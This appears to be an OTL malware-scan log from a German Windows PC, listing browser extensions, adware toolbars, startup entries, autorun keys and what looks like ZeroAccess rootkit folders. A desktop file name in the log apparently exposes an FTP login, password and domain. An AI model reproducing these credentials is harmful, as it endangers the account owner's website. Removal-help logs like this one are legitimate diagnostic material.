FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.08 16:39:12 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\firejump@firejump.net: C:\Users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\firejump@firejump.net [2012.04.12 10:27:18 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.08 16:39:12 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins
 
[2011.02.18 19:21:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Extensions
[2013.02.12 14:00:46 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions
[2011.06.09 19:34:49 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2011.02.18 19:26:18 | 000,000,000 | ---D | M] (HP Detect) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2}
[2012.04.12 10:27:18 | 000,000,000 | ---D | M] (FireJump) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\firejump@firejump.net
[2013.02.12 14:00:46 | 000,083,610 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi
[2012.09.13 21:26:35 | 000,698,867 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi
[2011.09.05 14:10:55 | 000,002,071 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{141EC851-F454-4579-9174-C9E9E1D88D64}.xml
[2011.09.05 14:10:55 | 000,002,182 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{17FFFFE5-2985-4E65-A59A-5F718CA14B4E}.xml
[2011.09.05 14:10:55 | 000,001,864 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{1AAA6855-731F-495F-ADA7-2516FE8EF2F7}.xml
[2013.02.08 16:39:05 | 000,000,000 | ---D | M] (No name found) -- C:\Programme\Mozilla Firefox\extensions
[2013.02.08 16:39:05 | 000,000,000 | ---D | M] (Skype extension) -- C:\Programme\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2013.02.08 16:39:06 | 000,000,000 | ---D | M] (Java Console) -- C:\Programme\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}
[2013.02.08 16:39:03 | 000,000,000 | ---D | M] (Hotspot Shield Helper (Please allow this installation)) -- C:\Programme\Mozilla Firefox\extensions\afurladvisor@anchorfree.com
[2013.02.08 16:39:04 | 000,000,000 | ---D | M] (Modul zur Link-Untersuchung) -- C:\Programme\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak
[2013.02.08 16:40:09 | 000,262,552 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012.06.30 07:09:43 | 000,001,392 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom-de.xml
[2012.10.05 18:41:04 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012.06.30 07:09:43 | 000,001,153 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay-de.xml
[2012.06.30 07:09:43 | 000,006,805 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\leo_ende_de.xml
[2012.06.30 07:09:43 | 000,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-de.xml
[2012.06.30 07:09:43 | 000,001,105 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-de.xml
 
O1 HOSTS File: ([2012.06.29 16:08:36 | 000,000,705 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O2 - BHO: (Babylon toolbar helper) - {2EECD738-5844-4a99-B4B6-146BF802613B} - C:\Programme\BabylonToolbar\BabylonToolbar\1.8.3.8\bh\BabylonToolbar.dll (Babylon BHO)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O2 - BHO: (Hotspot Shield Toolbar) - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Programme\Hotspot Shield\HssIE\HssIE.dll (AnchorFree Inc.)
O3 - HKLM\..\Toolbar: (Babylon Toolbar) - {98889811-442D-49dd-99D7-DC866BE87DBC} - C:\Programme\BabylonToolbar\BabylonToolbar\1.8.3.8\BabylonToolbarTlbr.dll (Babylon Ltd.)
O3 - HKLM\..\Toolbar: (Hotspot Shield Toolbar) - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
O3 - HKCU\..\Toolbar\WebBrowser: (Hotspot Shield Toolbar) - {C95A4E8E-816D-4655-8C79-D736DA1ADB6D} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)
O4 - HKLM..\Run: [Ocs_SM] C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizer.exe (OCS)
O4 - HKLM..\Run: [SoundMAX] C:\Program Files\Analog Devices\SoundMAX\soundmax.exe (Analog Devices, Inc.)
O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKCU..\Run: [RocketDock] C:\Program Files\RocketDock\RocketDock.exe ()
O4 - HKCU..\Run: [WMPNSCFG] C:\Programme\Windows Media Player\wmpnscfg.exe (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 28
O9 - Extra Button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O9 - Extra 'Tools' menuitem : Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Reg Error: Value error.)
O16 - DPF: {CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Java Plug-in 1.6.0_35)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Java Plug-in 10.10.2)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{AC1F1EA0-BD7D-4511-87CD-7023DBE3F1CA}: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BEB5FB91-4729-4169-BB55-67335B073F1B}: DhcpNameServer = 8.8.8.8
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg
O24 - Desktop BackupWallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006.09.18 22:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O32 - AutoRun File - [2011.02.22 17:59:49 | 000,000,000 | -H-D | M] - G:\autorun -- [ NTFS ]
O32 - Unable to obtain root file information for disk G:\
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)
ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - 
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 11.0
ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - 
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Webordner
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\system32\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\Windows\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\system32\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
 
NetSvcs: FastUserSwitchingCompatibility -  File not found
NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)
NetSvcs: Nla -  File not found
NetSvcs: Ntmssvc -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: SRService -  File not found
NetSvcs: WmdmPmSp -  File not found
NetSvcs: LogonHours -  File not found
NetSvcs: PCAudit -  File not found
NetSvcs: helpsvc -  File not found
NetSvcs: uploadmgr -  File not found
 
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2013.02.18 23:27:39 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe
[2013.02.18 23:13:39 | 000,000,000 | ---D | C] -- C:\Users\TuS\Desktop\twentytwelve-alt
[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad++
[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Notepad++
[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Program Files\Notepad++
[2013.02.08 16:39:00 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MP3Gain
[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MP3Gain
[2013.01.29 19:19:25 | 000,000,000 | ---D | C] -- C:\Program Files\MP3Gain
[2013.01.24 20:59:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
[2013.01.24 20:59:07 | 000,000,000 | ---D | C] -- C:\Program Files\QuickTime
[2013.01.24 18:46:22 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Malwarebytes
[2013.01.24 18:46:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2013.01.24 18:45:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2013.01.24 18:45:55 | 000,021,104 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\System32\drivers\mbam.sys
[2013.01.24 18:45:55 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[1 C:\*.tmp files -> C:\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2013.02.18 23:30:06 | 000,000,000 | ---- | M] () -- C:\Users\TuS\Desktop\250402-ftp               H7gG74HuBg7FJ            Tus-schildgen.de
[2013.02.18 23:27:47 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe
[2013.02.18 23:19:19 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2013.02.18 23:19:19 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2013.02.18 22:58:03 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel
[2013.02.18 19:18:44 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.02.18 19:18:38 | 2073,313,280 | -HS- | M] () -- C:\hiberfil.sys
[2013.02.18 17:31:31 | 000,000,012 | ---- | M] () -- C:\Windows\bthservsdp.dat
[2013.02.18 14:52:59 | 000,628,742 | ---- | M] () -- C:\Windows\System32\perfh007.dat
[2013.02.18 14:52:59 | 000,595,996 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2013.02.18 14:52:59 | 000,126,260 | ---- | M] () -- C:\Windows\System32\perfc007.dat
[2013.02.18 14:52:59 | 000,104,070 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2013.02.16 21:22:17 | 000,305,904 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.01.27 13:11:19 | 000,068,096 | ---- | M] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013.01.23 22:05:03 | 000,000,496 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini
[1 C:\*.tmp files -> C:\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2013.02.18 23:30:06 | 000,000,000 | ---- | C] () -- C:\Users\TuS\Desktop\250402-ftp               H7gG74HuBg7FJ            Tus-schildgen.de
[2013.02.18 21:29:48 | 000,021,751 | ---- | C] () -- C:\Users\TuS\.recently-used.xbel
[2012.10.21 13:20:44 | 000,000,496 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini
[2012.10.16 11:03:56 | 000,000,000 | ---- | C] () -- C:\Windows\System32\cd.dat
[2012.09.17 18:11:49 | 000,438,272 | ---- | C] () -- C:\Windows\System32\PaintX.dll
[2012.09.11 20:07:01 | 000,224,118 | ---- | C] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg
[2012.06.03 16:11:50 | 000,000,021 | ---- | C] () -- C:\Users\TuS\.gtk-bookmarks
[2012.05.10 18:25:22 | 000,201,488 | ---- | C] () -- C:\Windows\System32\MACD32.DLL
[2012.05.10 18:25:22 | 000,144,144 | ---- | C] () -- C:\Windows\System32\MASE32.DLL
[2012.05.10 18:25:22 | 000,141,584 | ---- | C] () -- C:\Windows\System32\MAMC32.DLL
[2012.05.10 18:25:22 | 000,063,248 | ---- | C] () -- C:\Windows\System32\MASD32.DLL
[2012.05.10 18:25:22 | 000,033,040 | ---- | C] () -- C:\Windows\System32\MA32.DLL
[2012.04.03 11:20:55 | 000,000,403 | ---- | C] () -- C:\Windows\ODBC.INI
[2011.02.21 18:56:09 | 000,117,248 | ---- | C] () -- C:\Windows\System32\EhStorAuthn.dll
[2011.02.21 18:56:09 | 000,107,612 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin
[2011.02.21 18:18:14 | 000,018,904 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin
[2011.02.19 18:56:07 | 000,017,089 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\UserTile.png
[2011.02.18 17:57:29 | 000,068,096 | ---- | C] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011.02.18 16:50:52 | 000,001,356 | ---- | C] () -- C:\Users\TuS\AppData\Local\d3d9caps.dat
 
========== ZeroAccess Check ==========
 
[2011.11.18 21:23:34 | 000,002,048 | -HS- | M] () -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\@
[2011.11.18 21:23:34 | 000,000,000 | -HSD | M] -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\L
[2012.08.28 22:41:46 | 000,000,000 | -HSD | M] -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\U
[2012.08.28 22:11:24 | 000,001,712 | ---- | M] () -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\U\00000001.@
[2006.11.02 13:51:16 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 18:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 07:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 07:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2012.11.30 14:56:09 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Babylon
[2012.05.16 18:58:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\DesktopIconForAmazon
[2013.02.18 23:28:31 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\FileZilla
[2013.02.18 21:29:48 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\gtk-2.0
[2011.09.05 16:12:15 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\ICQ
[2011.08.18 01:05:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\InfraRecorder
[2013.02.01 23:45:36 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Mp3tag
[2013.02.18 22:57:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Notepad++
[2011.09.05 14:10:44 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OCS
[2011.06.09 20:22:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OpenOffice.org
[2011.09.05 14:10:55 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Opera
[2011.02.19 18:56:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\PeerNetworking
[2012.07.02 09:05:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\redsn0w
[2011.07.01 11:08:57 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Scribus
[2013.01.05 15:53:20 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\TeamViewer
[2011.07.01 10:56:46 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Thunderbird
[2011.11.20 09:24:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Verbindungsassistent
[2012.06.29 11:29:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\WindSolutions
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %SYSTEMDRIVE%\*. >
[2011.02.18 16:51:12 | 000,000,000 | -HSD | M] -- C:\$Recycle.Bin
[2012.09.06 17:40:28 | 000,000,000 | ---D | M] -- C:\Backup 05.09.2012
[2009.07.18 19:38:55 | 000,000,000 | ---D | M] -- C:\BlueByte
[2011.02.21 19:28:10 | 000,000,000 | -HSD | M] -- C:\boot
[2013.02.16 19:05:44 | 000,000,000 | -HSD | M] -- C:\Config.Msi
[2006.11.02 13:59:44 | 000,000,000 | -HSD | M] -- C:\Documents and Settings
[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Dokumente und Einstellungen
[2008.07.12 07:16:50 | 000,000,000 | -H-D | M] -- C:\hp
[2011.02.18 17:57:39 | 000,000,000 | ---D | M] -- C:\Intel
[2012.04.04 13:49:05 | 000,000,000 | -H-D | M] -- C:\kleaner.tmp
[2012.05.21 14:38:33 | 000,000,000 | ---D | M] -- C:\LuPO
[2012.09.17 19:09:03 | 000,000,000 | ---D | M] -- C:\Meine Webseiten
[2009.02.05 16:35:24 | 000,000,000 | RH-D | M] -- C:\MSOCache
[2008.01.21 03:43:50 | 000,000,000 | ---D | M] -- C:\PerfLogs
[2013.02.18 22:34:57 | 000,000,000 | R--D | M] -- C:\Program Files
[2013.02.18 19:20:39 | 000,000,000 | -H-D | M] -- C:\ProgramData
[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Programme
[2013.02.11 19:28:12 | 000,000,000 | ---D | M] -- C:\SPG-Verein
[2011.02.19 18:29:32 | 000,000,000 | ---D | M] -- C:\Swsetup
[2013.02.18 23:31:32 | 000,000,000 | -HSD | M] -- C:\System Volume Information
[2011.02.18 17:15:31 | 000,000,000 | -H-D | M] -- C:\System.sav
[2012.04.03 11:13:07 | 000,000,000 | ---D | M] -- C:\Temp
[2011.02.18 16:50:49 | 000,000,000 | R--D | M] -- C:\Users
[2012.12.14 09:34:41 | 000,000,000 | ---D | M] -- C:\Windows
 
< %PROGRAMFILES%\*.exe >
 
< %LOCALAPPDATA%\*.exe >
 
< %systemroot%\*. /mp /s >
 
< C:\Windows\system32\*.tsp >
[2006.11.02 10:44:49 | 000,031,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp
[2006.11.02 10:44:49 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp
[2006.11.02 10:44:49 | 000,049,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp
[2006.11.02 10:44:49 | 000,081,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp
[2009.04.11 07:27:17 | 000,280,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp
